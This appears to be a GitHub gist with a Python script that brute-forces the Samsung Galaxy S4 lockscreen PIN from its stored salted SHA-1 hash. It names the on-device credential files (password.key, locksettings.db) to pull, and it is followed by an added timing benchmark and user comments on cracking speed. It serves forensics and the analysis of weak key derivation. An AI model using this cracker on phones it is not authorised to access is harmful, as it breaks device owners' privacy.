@hubert3
Last active September 24, 2024 14:47
Python implementation of passcode hashing algorithm used on the Samsung Galaxy S4 GT-I9505 4.2.2
```python
#!/usr/bin/env python3
'''
Python implementation of passcode hashing algorithm used on the Samsung Galaxy S4 GT-I9505 4.2.2
Correct PIN for hash and salt below is 1234.
Get 40-character hash value in ascii hex format from file /data/system/password.key on the phone
Get salt in signed numeric format by doing sqlite3 query SELECT value FROM locksettings WHERE name = 'lockscreen.password_salt' on /data/system/locksettings.db
by @hubert3 2014-01-23
'''
import sys
from hashlib import sha1
from binascii import unhexlify


def get_salt(salt):
    # The salt is stored as a signed 64-bit integer: reinterpret it as
    # unsigned and return lowercase hex without the '0x' prefix.
    int_salt = int(salt) & 0xffffffffffffffff
    return format(int_salt, 'x').encode('ascii')


samsung_hash = unhexlify('867B4B7F6C7E5CCC50A1BD183D8C3E5801F20344'.lower())
salt = get_salt(-3343618892075477414)

for pin in map('{:04}'.format, range(0, 10000)):
    print('Hashing PIN %s' % pin)
    secret = pin.encode('ascii') + salt
    digest = sha1(b'0' + secret).digest()  # binary digest, not ascii hex
    for i in range(1, 1024):  # Samsung uses 1024 SHA-1 iterations
        # Each round hashes previous digest + round counter + PIN + salt
        digest = sha1(digest + str(i).encode('ascii') + secret).digest()
    if digest == samsung_hash:
        print('FOUND PIN %s' % pin)
        sys.exit(0)
print('PIN not found')
```
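The work factor of this scheme can be measured directly. The block below is an added example, not part of the original gist: it checks the gist's PIN 1234 test vector, times one guess, and projects the worst-case time for 4-, 6- and 8-digit passcodes. The function names and the PBKDF2 comparison point with 600,000 iterations are assumptions chosen for illustration.

```python
import hashlib
import time

# Test vector from the gist above (PIN 1234).
PAGE_SALT = -3343618892075477414
PAGE_HASH = "867B4B7F6C7E5CCC50A1BD183D8C3E5801F20344"

def salt_to_hex(salt):
    """Signed 64-bit salt -> unsigned lowercase hex, as get_salt() does."""
    return format(int(salt) & 0xFFFFFFFFFFFFFFFF, "x")

def samsung_pin_hash(pin, salt_hex, rounds=1024):
    """digest_0 = SHA1('0'+pin+salt); digest_i = SHA1(digest_{i-1}+str(i)+pin+salt)."""
    secret = (pin + salt_hex).encode("ascii")
    digest = b""
    for i in range(rounds):
        digest = hashlib.sha1(digest + str(i).encode("ascii") + secret).digest()
    return digest

def seconds_per_guess(kdf, repeats=5):
    """Median wall-clock cost of one kdf() call on this machine."""
    samples = []
    for _ in range(repeats):
        start = time.perf_counter()
        kdf()
        samples.append(time.perf_counter() - start)
    return sorted(samples)[len(samples) // 2]

def worst_case_seconds(per_guess, digits, workers=1):
    """Time to try every numeric passcode of the given length."""
    return per_guess * 10 ** digits / workers

if __name__ == "__main__":
    salt_hex = salt_to_hex(PAGE_SALT)
    assert samsung_pin_hash("1234", salt_hex).hex().upper() == PAGE_HASH
    schemes = {
        "SHA-1 x1024 (this page)":
            lambda: samsung_pin_hash("0000", salt_hex),
        # Assumed comparison point, not taken from the page.
        "PBKDF2-HMAC-SHA256 x600000":
            lambda: hashlib.pbkdf2_hmac("sha256", b"0000", salt_hex.encode(), 600_000),
    }
    for name, kdf in schemes.items():
        cost = seconds_per_guess(kdf)
        for digits in (4, 6, 8):
            total = worst_case_seconds(cost, digits)
            print(f"{name}: {cost * 1e3:.2f} ms/guess, "
                  f"{digits} digits exhausted in {total:,.0f} s")
```

The 20 seconds for 10,000 PINs reported in the comments below corresponds to about 2 ms per guess, which is the `per_guess` value to plug into `worst_case_seconds` for that machine.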

hubert3 commented Jan 22, 2014

Takes 20 seconds to try PINs 0000-9999 on 2.6 GHz i7

Python implementation based on info provided by Bjoern Kerler at donctl/sandy#2

@SomeoneWeird

Takes 7.5s on an i5 @ 3.2, nice job :)

@VivienGiraud

1.74 seconds with [email protected] + Multiprocessing.

@VivienGiraud

UPDATE:
On M1 pro :

  • Not parallelized (python 3.10 & 3.11) == 0.66 sec
  • Parallelized Python 3.10 & 3.11 == 0.13 sec

See you in 8 years with M7 Ultra 👋
